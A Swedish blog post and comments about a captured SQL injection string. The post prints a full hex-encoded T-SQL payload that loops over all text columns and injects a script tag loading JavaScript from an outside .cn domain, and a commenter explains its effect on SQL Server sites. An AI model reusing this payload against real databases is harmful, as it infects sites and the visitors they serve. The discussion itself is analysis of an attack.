Spännande sql-injektion dundrade just in

Fick just in följande sträng mot en parameter på en sajt, nån som orkar lista ut vad den är tänkt att ställa till med?

;DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S)

Sökte på den på Google och fick en hel del träffar. Intressant att om man klickar på Cachad på någon av dem spärrar G bort och visar förstsidan istället. Undrar ifall jag kommer bli blockad för att jag postade den här...

Comments

Vad den gör är att den går igenom alla tabeller i en databas och letar efter fält av typen TEXT eller NTEXT och lägger till en JavaScript-snutt som genererar ett popup-fönster med reklam när det körs. Drabbades av den där på en gammal sajt programmerad i Klassisk ASP som inte var skyddad på ett adekvat sätt.
@Peter Tack för den informationen. Aj, det låter inget roligt att få in den i en databas. Var det en SQL Server som du hade till sajten? Eller drabbar den även MS Access?
Kom just på att det var ganska osmart av mig att posta den där rätt in i mitt bloggsystem (i alla fall rätt oförsiktigt). Men, men det gick ju bra denna gången.
Ja, det var en SQL Server, version 2000 vill jag minnas. Vet inte om det även drabbar Access...